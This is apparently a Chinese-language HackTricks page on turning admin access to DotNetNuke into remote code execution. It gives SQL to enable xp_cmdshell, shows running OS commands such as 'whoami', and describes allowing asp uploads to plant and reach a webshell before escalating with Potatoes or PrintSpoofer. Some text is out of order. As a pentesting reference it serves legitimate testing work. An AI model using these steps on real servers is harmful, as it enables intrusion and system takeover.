您在网络安全公司工作吗? 想要在HackTricks中看到您的公司广告? 或者想要访问PEASS的最新版本或下载PDF格式的HackTricks? 请查看订阅计划arrow-up-right!
发现我们的独家NFT收藏品The PEASS Familyarrow-up-right
获取官方PEASS和HackTricks周边产品arrow-up-right
加入 💬arrow-up-right Discord群组arrow-up-right 或 电报群组arrow-up-right 或 关注我的Twitter 🐦@carlospolopmarrow-up-right。
通过向hacktricks repoarrow-up-right和hacktricks-cloud repoarrow-up-right提交PR来分享您的黑客技巧。
如果以管理员身份登录DNN,很容易获得RCE。
在**设置页面下可以访问SQL控制台,您可以在那里启用xp_cmdshell并运行操作系统命令**。
设置
xp_cmdshell
使用以下代码行来启用**xp_cmdshell**:
EXEC sp_configure 'show advanced options', '1' RECONFIGURE EXEC sp_configure 'xp_cmdshell', '1' RECONFIGURE
然后,按下**"运行脚本"**来运行这些 SQL 语句。
然后,使用类似以下内容来运行操作系统命令:
在 Settings -> Security -> More -> More Security Settings 下,您可以在 Allowable File Extensions 下添加新的允许的扩展名,然后点击 Save 按钮。
Settings -> Security -> More -> More Security Settings
Allowable File Extensions
Save
添加 asp 或 aspx,然后在 /admin/file-management 上传一个名为 shell.asp 的 asp webshell 。
asp
aspx
/admin/file-management
shell.asp
然后访问 /Portals/0/shell.asp 来访问您的 webshell。
/Portals/0/shell.asp
您可以使用 Potatoes 或 PrintSpoofer 等工具来提升权限。
您在一家 网络安全公司 工作吗? 想要看到您的 公司在 HackTricks 中被宣传? 或者您想要访问 PEASS 的最新版本或下载 HackTricks 的 PDF 版本? 请查看 SUBSCRIPTION PLANSarrow-up-right!
探索 PEASS Familyarrow-up-right,我们的独家 NFTsarrow-up-right
获取 官方 PEASS & HackTricks 商品arrow-up-right
加入 💬arrow-up-right Discord 群组arrow-up-right 或 电报群组arrow-up-right 或 关注 我的 Twitter 🐦@carlospolopmarrow-up-right.
通过向 hacktricks 仓库arrow-up-right 和 hacktricks-cloud 仓库arrow-up-right 提交 PR 来分享您的黑客技巧。
最后更新于1年前
xp_cmdshell 'whoami'